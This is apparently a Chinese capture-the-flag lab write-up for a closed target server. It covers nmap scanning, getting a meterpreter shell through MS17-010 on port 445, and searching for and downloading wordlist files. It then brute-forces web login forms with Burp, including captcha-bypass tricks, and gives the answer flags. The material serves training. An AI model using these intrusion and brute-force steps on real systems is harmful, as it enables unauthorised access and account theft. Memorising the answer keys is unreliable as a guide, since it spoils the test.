任务环境说明:
服务器场景名称:sql008
服务器场景用户名:administrator;密码:未知(封闭靶机)
1.使用渗透机场景kali中工具扫描服务器场景,将iis的版本号作为flag提交;
思路:nmap直接扫就行
FLAG:Microsoft IIS httpd 7.5
2.使用渗透机场景windows7访问服务器场景,并下载某文件夹下的web目录下的username.txt和wxl_pass_burp.txt,并将username.txt中的用户数量作为flag提交;
思路:这题我没有找到相应的网站,但是我发现服务器445端口是开的,试着ms17打进去,然后在里面去找

用ms17进去
meterpreter > shell #进入cmd
chcp 65001 #改编码
cd .. #返回到上一级目录,一直到c:\
dir /s username.txt #搜索c盘根目录下文件(包括子目录)
dir /s wxl_pass_burp.txt


知道文件位置在c:\ftp\web目录下面,返回meterpreter下载两个txt文档
meterpreter>cd c:/ftp/wed #进入到C:\ftp\web目录下

meterpreter>download 文件名 /root #将靶机指定文件下载到kali的root目录下

然后到root目录下查看就行

FLAG:7
3.使用渗透机场景windows7访问服务器中的暴力破解首页,并将首页的flag提交;
思路:还是在meterpreter中,进到cmd去寻找web目录

有一个phpstudy目录,有可能是一个网页目录

其中三个目录,burp从名字中推断可能要使用burp抓包,应该就是爆破页面
浏览器访问一下

这题的flag就在源码里面直接搜就行

FLAG:flag:zhedounengkanjian666
4.使用渗透机场景windows7访问服务器场景web暴力破解页面(结合1、2题),进入基于表单的暴力破解进行账号密码的爆破,将爆破后返回的flag提交;
思路:直接burp抓包爆破就行,字典是第二题下载下来的文件

FLAG:flag:success
5.使用渗透机场景windows7访问服务器场景web暴力破解页面(结合1、2题),进入验证码绕过(on server)进行账号密码的爆破,将爆破后返回的flag提交;
思路:账号密码随便输,但是验证码一定要填一致,爆破时,变量选择账号和密码,然后常规爆破就行

FLAG:flag:hello_boy
6.使用渗透机场景windows7访问服务器场景web暴力破解页面(结合1、2题),进入验证码绕过(on client)进行账号密码的爆破,将爆破后返回的flag提交;
思路:删掉 name="vcode",账号密码随便输,正常爆破


FLAG:flag:zhenbang
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |